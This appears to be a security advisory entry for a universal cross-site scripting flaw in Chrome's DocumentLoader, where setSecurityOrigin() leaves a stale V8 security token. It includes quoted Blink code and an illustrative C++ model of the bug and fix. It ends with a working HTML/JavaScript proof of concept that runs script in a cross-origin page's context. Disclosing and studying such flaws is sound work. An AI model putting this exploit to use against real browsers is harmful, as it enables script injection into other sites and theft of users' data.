chrome: UXSS in DocumentLoader::createWriterFor

Basic fields

Vulnerability ID: SSV-97113
Disclosure/discovery date: 2016-02-02
Submission date: 2018-01-29
Severity: (not given)
Category: Universal cross-site scripting (UXSS)
Affected component: Google Chrome
Vulnerability author: dcheng
Submitter: Knownsec
CVE-ID: (not given)
CNNVD-ID: (not given)
CNVD-ID: (not given)
ZoomEye Dork: (not given)

Source

(not given)

Vulnerability details

Details:

third_party/WebKit/Source/core/loader/DocumentLoader.cpp:735:

PassRefPtrWillBeRawPtr<DocumentWriter> DocumentLoader::createWriterFor(const Document* ownerDocument, const DocumentInit& init,
    const AtomicString& mimeType, const AtomicString& encoding, bool dispatch, ParserSynchronizationPolicy parsingPolicy)
{
    LocalFrame* frame = init.frame();

    ASSERT(!frame->document() || !frame->document()->isActive());
    ASSERT(frame->tree().childCount() == 0);

    if (!init.shouldReuseDefaultView())
        frame->setDOMWindow(LocalDOMWindow::create(*frame));

    RefPtrWillBeRawPtr<Document> document = frame->localDOMWindow()->installNewDocument(mimeType, init);
    if (ownerDocument) {
        document->setCookieURL(ownerDocument->cookieURL());
        document->setSecurityOrigin(ownerDocument->securityOrigin());
    }
    // ... (remainder of the function omitted on the page)
}

DocumentLoader calls Document::setSecurityOrigin() instead of Document::updateSecurityOrigin(). The latter also notifies the frame's script controller, which recomputes the security token cached on the document's V8 context; the former changes only the Document's SecurityOrigin. So although the new document inherits the correct SecurityOrigin from the owner, the reused V8 context keeps the security token of the previous document, and it is that stale token V8 compares when deciding whether one context may touch another context's objects.
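To make the two layers of state concrete, here is a small C++ model of the mismatch described above. It is an added example written for this page, not Blink code: SecurityOrigin, ScriptContext, Document and fastPathAllows() are stand-ins for the real classes and for V8's token comparison, and the origins attacker.example and victim.example are constructed test data. The model shows that after the document swap the Document reports the owner's origin while the reused context still passes the fast-path check for the frame's previous origin, and that updateSecurityOrigin() removes the mismatch.

```cpp
// Added example, not Blink code: a deliberately small model of the per-frame
// state this advisory is about. Names are borrowed from Blink for readability;
// the bodies are assumptions made for the illustration.
#include <cassert>
#include <string>

// Origin as held by Document::securityOrigin().
struct SecurityOrigin {
    std::string scheme;
    std::string host;
    // The token V8 caches on a context: same origin <=> same token.
    std::string token() const { return scheme + "://" + host; }
};

// The V8 context owned by the window. When the window is reused
// (DocumentInit::shouldReuseDefaultView()), this object survives the
// document swap, and so does its cached token.
struct ScriptContext {
    std::string securityToken;
};

struct Document {
    SecurityOrigin origin;
    ScriptContext* context;

    // Mirrors Document::setSecurityOrigin(): only the Document changes.
    void setSecurityOrigin(const SecurityOrigin& o) { origin = o; }

    // Mirrors Document::updateSecurityOrigin(): also tells the script
    // controller, which re-derives the context's token from the new origin.
    void updateSecurityOrigin(const SecurityOrigin& o) {
        setSecurityOrigin(o);
        context->securityToken = o.token();
    }
};

// V8's fast-path access check between two contexts: equal tokens grant
// access without ever looking at the documents' SecurityOrigins.
bool fastPathAllows(const ScriptContext& accessing, const ScriptContext& target) {
    return accessing.securityToken == target.securityToken;
}

// Model of createWriterFor(): install a new document into a frame whose
// window (and context) is reused, inheriting the owner's origin.
// Returns true when the Document claims the owner's origin while a context
// still running as the frame's previous origin passes the fast path against
// it, i.e. when the cached token is stale.
bool installInheritsOriginButLeaksOldToken(bool useUpdateSecurityOrigin) {
    const SecurityOrigin previous{"https", "attacker.example"};   // constructed
    const SecurityOrigin ownerOrigin{"https", "victim.example"};  // constructed

    // Before the swap the frame's old document set the context's token.
    ScriptContext reusedContext{previous.token()};

    Document newDocument{SecurityOrigin{}, &reusedContext};
    if (useUpdateSecurityOrigin)
        newDocument.updateSecurityOrigin(ownerOrigin);  // the fix
    else
        newDocument.setSecurityOrigin(ownerOrigin);     // what createWriterFor did

    // Another frame that is still running as the previous origin.
    ScriptContext attackerContext{previous.token()};

    bool originSaysVictim = newDocument.origin.host == "victim.example";
    bool fastPathTreatsAsAttacker = fastPathAllows(attackerContext, reusedContext);
    return originSaysVictim && fastPathTreatsAsAttacker;
}

int main() {
    assert(installInheritsOriginButLeaksOldToken(false));  // vulnerable: token stale
    assert(!installInheritsOriginButLeaksOldToken(true));  // fixed: token refreshed
    return 0;
}
```

The point of the model is the split: the origin lives on the Document, the token lives on the context, and a reused context only learns about a new origin if somebody tells the script controller. Any code path that installs a document into a reused window with setSecurityOrigin() alone leaves the two out of sync.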

Repro:

<body>
<script>
// Embed a cross-origin page that itself contains a child frame.
var frame = document.body.appendChild(document.createElement("iframe"));
frame.src = "https://www.google.com/intl/en/ads/";
frame.onload = function () {
    frame.onload = null;
    // Navigating a nested frame cross-origin is allowed; load a data: document there.
    frame.contentWindow.frames[0].location = "data:text/html,<script>(" + function () {
        frame = document.documentElement.appendChild(document.createElement("iframe"));
        frame.contentWindow.setTimeout("parent.document.open()", 0);
        setTimeout(function () { location = "javascript:'<script>parent.eval(\"alert(location)\")</scr" + "ipt>'" }, 0);
    } + "())</scr" + "ipt>";
}
</script>
</body>

Note that the document.open() call in the repro is there to set the document URL to about:blank, which forces the javascript:-generated document to inherit its origin from the parent frame's document.


PoC (not a pocsuite plugin): identical to the repro HTML above.


References

(none given)

Solutions

Workaround

No workaround available yet.

Official fix

No official fix available yet.

Mitigation

No mitigation available yet.
